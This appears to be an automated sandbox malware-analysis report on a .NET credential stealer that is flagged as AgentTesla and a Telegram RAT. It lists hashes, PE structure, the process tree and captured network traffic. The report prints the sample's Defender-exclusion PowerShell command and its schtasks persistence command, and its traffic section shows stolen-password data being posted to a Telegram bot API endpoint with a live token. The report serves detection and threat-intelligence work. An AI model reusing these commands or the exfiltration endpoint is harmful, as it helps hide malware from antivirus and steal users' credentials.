Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b..............0.............^.... ........@.. ....................................@.....................................K.......X............................................................................ ............... ..H............text...d.... ...................... ..`.rsrc...X...........................@..@.reloc..............................@..B................@.......H........%...z............. Y...........................................0../.......(....8.....(....8....*.....%..}......}....8......0............{.........8......*8....8.......0..y.......8........E........8.......}....8........8.....*..9....8.....8.... ....(....9....&8.......{....:.....8.....{....}....8........0..........8....8....8......*..(......8......(......8......&~.......*...~....*..(....8......}....8.....(....8.......(....8.....*...N..o....(....&8....*.0..........8P..

Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:false
                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5785
                                                                                          Entropy (8bit):5.403825327740831
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:BZJj8NJqDo1ZcZzj8NJqDo1Z5dvVjZCj8NJqDo1ZCMllAZX:x
                                                                                          MD5:8C9B86A68DE92A5286D498CBE35D068A
                                                                                          SHA1:F83313410A342E0780FABE083B3960A8DDD73635
                                                                                          SHA-256:C7B4FFE6FECD86389C2D31A208DC8D47542E3C09D34E357F7DD1A096E3DD6B56
                                                                                          SHA-512:6266FB9316CC39D846E6069706E072E075312C157CF7E46EA226D6EDF5678C53D4C9C046617D3090D00760B918917AD1961DBBF0232D2B16F75121973B2AE537
                                                                                          Malicious:false
                                                                                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527205011..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 347688 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\HksvOcmoc.exe..Process ID: 6688..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220527205011..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\HksvOcmoc.exe..**********************..Windows PowerShell transcript start..Start time: 20220527205404..Username: computer\user..RunAs User: computer\user.
                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.566668421486731
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                                                                                          File size:886272
                                                                                          MD5:adec785f7cbaa5af9c8c7fa50cf91baa
                                                                                          SHA1:d55fc2f774a1728526a753284e350aea08e3b17d
                                                                                          SHA256:fb6eb7efdf26e5f8eaab963dab6a7fb808724a4288d4df1fb8f146e13471e53d
                                                                                          SHA512:ff0afc52a2b2d18b16ae6dfe480966af0b372c39b8c2738315dbab03adbff0bed2f4c358acaa09296d40a83c77be8ed49fd82f1b0da216353581b62ea18be203
                                                                                          SSDEEP:12288:j0pGjZ16ryOpqfE5Cg0iAgCBBKWcZL/Z7W3bFqrdlBgo0iVSJj1sGVJt1q0j:gpGjmpaE4gN2BXcZR7+IrFgRj1bVF
                                                                                          TLSH:B715C02876574E01C09D0BFE84C3642407E99E867865FB839D45BAD22B727D85FCBB83
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0.............^.... ........@.. ....................................@................................
                                                                                          Icon Hash:0b1b233b332b2b2b
                                                                                          Entrypoint:0x4bfc5e
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                          Time Stamp:0x6290DBB9 [Fri May 27 14:10:01 2022 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbfc10 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc0000 | 0x1a358 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xdc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xbfbcc | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xbdc64 | 0xbde00 | False | 0.88429245186 | data | 7.75075398615 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xc0000 | 0x1a358 | 0x1a400 | False | 0.156454613095 | data | 4.28258053659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xdc000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0xc0190 | 0x94a8 | data | |
RT_ICON | 0xc9638 | 0x10828 | data | |
RT_GROUP_ICON | 0xd9e60 | 0x22 | data | |
RT_GROUP_ICON | 0xd9e84 | 0x14 | data | |
RT_VERSION | 0xd9e98 | 0x2d4 | data | |
RT_MANIFEST | 0xda16c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
LegalCopyright |
Assembly Version | 1.0.0.0
InternalName | PARAMD.exe
FileVersion | 1.0.0.0
CompanyName |
LegalTrademarks |
Comments |
ProductName |
ProductVersion | 1.0.0.0
FileDescription |
OriginalFilename | PARAMD.exe
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 20:50:47.403879881 CEST | 49764 | 443 | 192.168.2.4 | 149.154.167.220
May 27, 2022 20:50:47.403924942 CEST | 443 | 49764 | 149.154.167.220 | 192.168.2.4
May 27, 2022 20:50:47.404026031 CEST | 49764 | 443 | 192.168.2.4 | 149.154.167.220
May 27, 2022 20:50:47.504790068 CEST | 49764 | 443 | 192.168.2.4 | 149.154.167.220
May 27, 2022 20:50:47.504827023 CEST | 443 | 49764 | 149.154.167.220 | 192.168.2.4
May 27, 2022 20:50:47.572382927 CEST | 443 | 49764 | 149.154.167.220 | 192.168.2.4
May 27, 2022 20:50:47.572501898 CEST | 49764 | 443 | 192.168.2.4 | 149.154.167.220
May 27, 2022 20:50:47.577042103 CEST | 49764 | 443 | 192.168.2.4 | 149.154.167.220
May 27, 2022 20:50:47.577081919 CEST | 443 | 49764 | 149.154.167.220 | 192.168.2.4
May 27, 2022 20:50:47.577377081 CEST | 443 | 49764 | 149.154.167.220 | 192.168.2.4
May 27, 2022 20:50:47.710206985 CEST | 49764 | 443 | 192.168.2.4 | 149.154.167.220
May 27, 2022 20:50:49.022193909 CEST | 49764 | 443 | 192.168.2.4 | 149.154.167.220
May 27, 2022 20:50:49.049877882 CEST | 443 | 49764 | 149.154.167.220 | 192.168.2.4
May 27, 2022 20:50:49.056047916 CEST | 49764 | 443 | 192.168.2.4 | 149.154.167.220
May 27, 2022 20:50:49.096498966 CEST | 443 | 49764 | 149.154.167.220 | 192.168.2.4
May 27, 2022 20:50:49.180016994 CEST | 443 | 49764 | 149.154.167.220 | 192.168.2.4
May 27, 2022 20:50:49.180107117 CEST | 443 | 49764 | 149.154.167.220 | 192.168.2.4
May 27, 2022 20:50:49.180901051 CEST | 49764 | 443 | 192.168.2.4 | 149.154.167.220
May 27, 2022 20:50:49.181226969 CEST | 49764 | 443 | 192.168.2.4 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 20:50:47.337369919 CEST | 56509 | 53 | 192.168.2.4 | 8.8.8.8
May 27, 2022 20:50:47.356251001 CEST | 53 | 56509 | 8.8.8.8 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 27, 2022 20:50:47.337369919 CEST | 192.168.2.4 | 8.8.8.8 | 0xc38e | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 27, 2022 20:50:47.356251001 CEST | 8.8.8.8 | 192.168.2.4 | 0xc38e | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)
                                                                                          • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49764 | 149.154.167.220 | 443 | C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 18:50:49 UTC | 0 | OUT | POST /bot5279079600:AAH3TUQchNyBBlwuTxWo12fRiywroON6BJo/sendDocument HTTP/1.1
                                                                                          Content-Type: multipart/form-data; boundary=---------------------------8da40272c67fce7
                                                                                          Host: api.telegram.org
                                                                                          Content-Length: 993
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
2022-05-27 18:50:49 UTC | 0 | IN | HTTP/1.1 100 Continue
                                                                                          2022-05-27 18:50:49 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 34 30 32 37 32 63 36 37 66 63 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 33 36 35 31 36 36 36 34 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 34 30 32 37 32 63 36 37 66 63 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 33 34 37 36 38 38 0a 4f 53 46 75 6c 6c
                                                                                          Data Ascii: -----------------------------8da40272c67fce7Content-Disposition: form-data; name="chat_id"5365166645-----------------------------8da40272c67fce7Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/347688OSFull
2022-05-27 18:50:49 UTC | 1 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Fri, 27 May 2022 18:50:49 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 633
                                                                                          Connection: close
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                          {"ok":true,"result":{"message_id":319,"from":{"id":5279079600,"is_bot":true,"first_name":"Linny","username":"linn98_bot"},"chat":{"id":5365166645,"first_name":"Lingard","last_name":"Lynny","username":"lingardlynny","type":"private"},"date":1653677449,"document":{"file_name":"user-347688 2022-05-27 09-22-09.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBP2KRHYlbxwXmQOy711P1s1ORLFN3AAIVCwACF0eJUBAf65j0CTMRJAQ","file_unique_id":"AgADFQsAAhdHiVA","file_size":423},"caption":"New PW Recovered!\n\nUser Name: user/347688\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}



Target ID: 0
Start time: 20:49:40
Start date: 27/05/2022
Path: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe"
Imagebase: 0x1f0000
File size: 886272 bytes
MD5 hash: ADEC785F7CBAA5AF9C8C7FA50CF91BAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
                                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.352372028.0000000007080000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.346224005.0000000002864000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 9
Start time: 20:50:07
Start date: 27/05/2022
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exe
Imagebase: 0x12b0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 10
Start time: 20:50:08
Start date: 27/05/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff647620000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 12
Start time: 20:50:10
Start date: 27/05/2022
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmp
Imagebase: 0xa90000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 14
Start time: 20:50:11
Start date: 27/05/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff647620000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 15
Start time: 20:50:12
Start date: 27/05/2022
Path: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Imagebase: 0xa40000
File size: 886272 bytes
MD5 hash: ADEC785F7CBAA5AF9C8C7FA50CF91BAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000000.338699898.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000000.338699898.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000000.327062889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000000.327062889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.521016859.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.521016859.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000000.338146222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000000.338146222.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: low


Execution Graph

Execution Coverage: 15.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 59
Total number of Limit Nodes: 9
[execution graph rendering not reproduced; API calls referenced in the graph: GetSystemMetrics, GetCurrentThreadId, CreateActCtxA]

                                                                                            Control-flow Graph

[control-flow graph rendering not reproduced]
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343735632.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_ae0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f1a7e5c7f517b34d6b046ae492d4c9d2df525a5cd8d9c028d00a70a3358610c8
                                                                                            • Instruction ID: e83258940252cb043f9c944a931088f642166d7b681b63dfcb999e380d7e3966
                                                                                            • Opcode Fuzzy Hash: f1a7e5c7f517b34d6b046ae492d4c9d2df525a5cd8d9c028d00a70a3358610c8
                                                                                            • Instruction Fuzzy Hash: 04716778D055488FDB45DFAAE84169EBBF2BBCD308F04C529D004AB278EB71590BAB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

[control-flow graph rendering not reproduced; graph entry calls CreateActCtxA]
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00AE57F9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343735632.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_ae0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 5b7c88063a68768ec39ad63473daa3ef4a915a14bdc5a3c446aa3e6e0e40f577
                                                                                            • Instruction ID: b052c7eb4b5736cf1320cc7a3fb25638c2f333b8f195ec6dd844b93a2b355f4c
                                                                                            • Opcode Fuzzy Hash: 5b7c88063a68768ec39ad63473daa3ef4a915a14bdc5a3c446aa3e6e0e40f577
                                                                                            • Instruction Fuzzy Hash: 6641F370C0465CDBDB24CFA9D8847CEBBB5FF88308F108069D508AB255DB756946DF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

[control-flow graph rendering not reproduced; graph entry calls CreateActCtxA]
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00AE57F9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.343735632.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ae0000_SecuriteInfo.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 95b389cb342906a7fcbdf6131ffebdd589e8ebb24671d09cd529768969cf3dd6
• Instruction ID: 4ca6b472f1510cf7355b5915dee4381b5b204b1076d69708d502be2f11dc035a
• Opcode Fuzzy Hash: 95b389cb342906a7fcbdf6131ffebdd589e8ebb24671d09cd529768969cf3dd6
• Instruction Fuzzy Hash: 9B41F270C0465CCBDB24CFAAD884BCEBBB5BF88308F108469D408AB255DBB56946CF90
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 39c464f874942b25d423147f29ddc75a58cd0f9f4df60f96cfc7f5e5717f5ad3
• Instruction ID: 9cca85791b4578acc36566597255d7ff9e4c148cb6b297bef4d9ce7b45f5a1d2
• Opcode Fuzzy Hash: 39c464f874942b25d423147f29ddc75a58cd0f9f4df60f96cfc7f5e5717f5ad3
• Instruction Fuzzy Hash: F72107B1504244EFDB05DF14E9C0B2ABF65FB94324F24C669F9094B24AC336E856D7A2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 06e8d29e9bd935d334aa711cdf7d24074f4e154987860d0109339aa92d0d74f9
• Instruction ID: f40c33afeef230c0413e96d675b77f7befaa0b7690d9874152d4b8e66b2ff127
• Opcode Fuzzy Hash: 06e8d29e9bd935d334aa711cdf7d24074f4e154987860d0109339aa92d0d74f9
• Instruction Fuzzy Hash: 8B2137B1604244DFCB01CF14E9C0B2ABF75FB88328F248569F9054B24AC336D856DBA2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343410847.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a4d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 063e5ffd10c21b1e3a56d3ad9285fa95e1448e42f24e3afe5124415bc9d6af58
• Instruction ID: 158f8b3c78772fd71e043e97f89bab96a88d226fe9867bcc68590fb1880fd979
• Opcode Fuzzy Hash: 063e5ffd10c21b1e3a56d3ad9285fa95e1448e42f24e3afe5124415bc9d6af58
• Instruction Fuzzy Hash: 072137B9604244EFCB01CF10C5C0B66BBA1FBC4318F20CA6DE9095B346C3B6D806CA61
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343410847.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a4d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ba8fe942cad666c0aae49c56295fc76190f118d93a78e876db7bb07e8c5e7172
• Instruction ID: 375a5e7c0d196895e89b639f8ebd3bd4b6c40eab1578f995ac6d707e040f2c94
• Opcode Fuzzy Hash: ba8fe942cad666c0aae49c56295fc76190f118d93a78e876db7bb07e8c5e7172
• Instruction Fuzzy Hash: 8A210479604244DFCB14DF24D9C4B26BB65FBC4318F24C9ADE90A4B34AC33AD847DA62
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
• Instruction ID: 5adf3ae5ec5e7fccdc59b6b56cec59a708192857fd710d7a478833ef32807387
• Opcode Fuzzy Hash: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
• Instruction Fuzzy Hash: EE11E676504284DFCF01CF10D5C4B16BF72FB94320F24C6A9E8484B656C33AE85ACBA1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343329566.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a3d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
• Instruction ID: 732866228e7fe73526df1bf996ec7fd4df146ff44cb80fd623da3f6ba29b5566
• Opcode Fuzzy Hash: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
• Instruction Fuzzy Hash: 4D110876504280CFCF12CF10D5C4B16BF71FB94324F24C6A9E8054B656C33AD85ACBA1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.343410847.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a4d000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
